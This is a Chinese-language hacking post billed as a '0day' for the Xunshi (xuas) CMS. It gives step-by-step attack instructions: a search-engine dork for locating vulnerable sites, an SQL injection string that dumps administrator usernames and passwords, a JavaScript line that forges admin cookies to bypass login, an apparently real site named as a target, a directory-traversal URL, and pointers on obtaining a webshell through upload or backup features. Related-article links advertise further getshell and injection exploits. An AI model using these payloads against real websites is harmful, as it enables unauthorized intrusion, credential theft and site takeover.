訊時(shí)系統(tǒng)(xuas)最新通殺漏洞0day圖文說明

google關(guān)鍵字:inurl:news_more.asp?lm2= (關(guān)鍵字很多的自己定義吧)
1、/admin/admin_news_pl_view.asp?id=1
//id任意 填入以下語句
2、有時(shí)1顯示錯(cuò)誤信息的時(shí)候繼續(xù)往后退2,3,4,我退到11才找到了頁面,郁悶!
3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
爆出管理員帳號(hào)和密碼了
4、cookies進(jìn)后臺(tái)
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
5、后臺(tái)用了cookie驗(yàn)證,直接訪問http://www.dxggw.cn/admin/admin_index.asp就OK了!
6、后臺(tái)有上傳和備份取SHELL不難。
7、訊時(shí)還有個(gè)列目錄漏洞:http://www.xx.com/edit/admin_uploadfile.asp?id=46&dir=../..
逍遙復(fù)仇:我搞了一個(gè)訊時(shí)cms4.1版本的沒有數(shù)據(jù)庫備份不知道怎么搞SHELL,有的說雖然后臺(tái)顯示但備份頁面是存在的,登錄后臺(tái)后訪問 http://www.xx.com/admin/admin_db_backup.asp?action=BackupData,我這個(gè)沒有,郁悶著呢,誰還有其他辦法提供一下,謝謝!
相關(guān)文章
- 最近看到網(wǎng)上曝出的dedecms最新版本的一個(gè)注入漏洞利用,漏洞PoC和分析文章也已在網(wǎng)上公開.但是在我實(shí)際測試過程當(dāng)中,發(fā)現(xiàn)無法復(fù)現(xiàn)2013-06-11
- 春節(jié)呆在家里上網(wǎng),我表哥突然找我說要一個(gè)DJ網(wǎng)站的VIP會(huì)員,說搞定后請我吃KFC,于是就答應(yīng)了。2011-03-22
DEDECMS 爆嚴(yán)重安全漏洞 免賬號(hào)密碼直接進(jìn)入后臺(tái)
眾所周知,因使用簡單、客戶群多,織夢CMS一直被爆出許多漏洞。今天小編在群里得到織夢官方論壇某版主可靠消息:DEDECMS爆嚴(yán)重安全漏洞,近期官方會(huì)發(fā)布相關(guān)補(bǔ)丁,望大家及2011-08-20- 腳本入侵-ASP網(wǎng)站入侵一些技巧 先說明下 先看下是不是html轉(zhuǎn)的asp生成的站2011-04-24
Linux系統(tǒng)采用netstat命令查看DDOS攻擊的方法
這篇文章主要為大家介紹了Linux系統(tǒng)采用netstat命令查看DDOS攻擊的方法,對于網(wǎng)絡(luò)安全而言非常重要!需要的朋友可以參考下2014-07-05- 手工注入方法,方便大家測試程序漏洞,本人只供學(xué)習(xí)交流,不建議搞破壞。2011-11-03
phpcms2008 代碼執(zhí)行 批量getshell EXP(使用菜刀)
這篇文章主要介紹了phpcms2008 代碼執(zhí)行 批量getshell EXP的相關(guān)資料,需要的朋友可以參考下2014-05-09- 腳本入侵-上傳漏洞總結(jié)篇(臭小子),從事于網(wǎng)站開發(fā)的程序員要看下,不要讓自己的程序別黑客利用。2011-04-24
- php后臺(tái)插一句話的思路加114網(wǎng)址導(dǎo)航后臺(tái)拿webshell的方法。2011-09-29
- DDos攻擊是現(xiàn)在大部分用戶最喜歡的一個(gè)話題,近兩年來發(fā)展態(tài)勢也漸趨平緩,歐洲反垃圾郵件組織Spamhaus突然遭受到高達(dá)300Gbps的大流量DDos攻擊被認(rèn)為是史上最大DDoS攻擊,2016-09-20